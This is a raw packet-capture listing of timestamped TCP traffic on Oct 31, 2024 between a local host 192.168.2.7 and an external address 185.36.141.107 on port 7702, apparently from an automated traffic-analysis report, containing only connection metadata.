Oct 31, 2024 14:16:16.038938999 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.038957119 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.038986921 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.039139032 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.039774895 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.039824963 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.039829969 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.039849997 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.039921045 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.039946079 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.081154108 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.081216097 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.081532955 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.081543922 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.081556082 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.081594944 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.081610918 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.081636906 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.081957102 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.153773069 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.153801918 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.153812885 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.153832912 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.153867960 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.153875113 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.153887033 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.153898954 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.153925896 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.154421091 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.154469967 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.154481888 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.154493093 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.154562950 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.154858112 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.154921055 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.154932976 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.154942989 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.154968977 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.155000925 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.196393013 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.196414948 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.196477890 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.196688890 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.196858883 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.196868896 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.196881056 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.196903944 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.196923971 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.269047976 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.269062996 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.269074917 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.269143105 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.269162893 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.269176006 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.269218922 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.269481897 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.269526005 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.269536972 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.269567013 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.269603014 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.269897938 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.269958973 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.269972086 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.270024061 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.270047903 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.270061016 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.270095110 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.270693064 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.270734072 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.270764112 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.311888933 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.311954975 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.312005043 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.312086105 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.312096119 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.312128067 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.312220097 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.312233925 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.312271118 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.384684086 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.384707928 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.384718895 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.384758949 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.384805918 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.384819984 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.384830952 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.384871960 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.385102987 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.385157108 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.385169983 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.385191917 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.385267019 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.385277033 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.385312080 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.385884047 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.385926008 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.426918983 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.426932096 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.426944017 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.427011013 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.427115917 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.427359104 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.427370071 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.427403927 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.427474022 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.427589893 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.427635908 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.427668095 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.427678108 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.427730083 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.499903917 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.499938965 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.499950886 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.499964952 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.500030041 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.500034094 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.500034094 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.500477076 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.500662088 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.500703096 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.500710964 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.500714064 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.500726938 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.500740051 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.500757933 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.503824949 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.542310953 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.542397976 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.542409897 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.542423010 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.542464972 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.542510986 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.542748928 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.542771101 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.542783022 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.542793989 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.542815924 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.542958021 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.543222904 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.543263912 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.615350962 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.615377903 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.615391016 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.615428925 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.615448952 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.615503073 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.615504026 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.615514994 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.615572929 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.615663052 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.615788937 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.615802050 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.615835905 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.615842104 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.616281033 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.616336107 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.616436005 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.616446972 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.616472006 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.616513014 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.616528988 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.616575003 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.657504082 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.657516956 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.657586098 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.658042908 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.658114910 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.658127069 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.658138990 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.658159018 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.658179045 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.701994896 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.702147961 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.702228069 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.702822924 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.702833891 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.702883959 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.730387926 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.730453968 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.730475903 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.730495930 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.730508089 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.730524063 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.730568886 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.730808973 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.730910063 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.730921030 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.730956078 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.731014013 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.731184959 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.731197119 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.731240034 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.731270075 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.731281996 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.731293917 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.731329918 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.773399115 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.773413897 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.773427010 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.773442030 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.773478031 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.773492098 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.773530006 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.773530006 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.773530006 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.817451000 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.817478895 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.817491055 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.817552090 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.817558050 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.817600012 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.845685959 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.845707893 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.845721006 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.845787048 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.845844030 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.845894098 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.845922947 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.846045017 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.846087933 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.846179008 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.846230030 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.846244097 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.846270084 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.846549988 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.846596956 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.846631050 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.846643925 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.846681118 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.846740961 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.846752882 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.846787930 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.888664961 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.888688087 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.888699055 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.888715029 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.888757944 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.888797998 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.932734013 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.932759047 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.932770014 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.932936907 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.961061001 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.961083889 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.961096048 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.961117029 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.961128950 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.961153030 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.961201906 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.961246014 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.961257935 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.961270094 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.961309910 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.962327957 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.962340117 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.962352037 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.962362051 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.962372065 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.962412119 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.962415934 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.962428093 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.962440014 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.962450027 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.962451935 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.962476969 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.004048109 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.004079103 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.004091024 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.004125118 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.004324913 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.275955915 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.275994062 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.276005983 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.276029110 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.276042938 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.276076078 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.276266098 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.276278973 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.276293039 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.276318073 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.276510954 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.276523113 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.276536942 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.276547909 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.276555061 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.276561022 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.276572943 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.276577950 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.276616096 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.276798964 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.276844025 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.276931047 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.276943922 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.276953936 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.276967049 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.276978970 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.276983023 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.276990891 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.277000904 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.277012110 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.277049065 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.277056932 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.277098894 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.277582884 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.277592897 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.277602911 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.277615070 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.277627945 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.277647018 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.277713060 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.277726889 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.277736902 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.277754068 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.277765989 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.277775049 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.277776957 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.277789116 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.277801037 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.277832031 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.278580904 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.278594971 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.278605938 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.278618097 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.278629065 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.278636932 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.278640985 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.278651953 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.278664112 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.278664112 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.278677940 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.278687000 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:17.278688908 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:17.278701067 CET	7702	49706	185.36.141.107	192.168.2.7
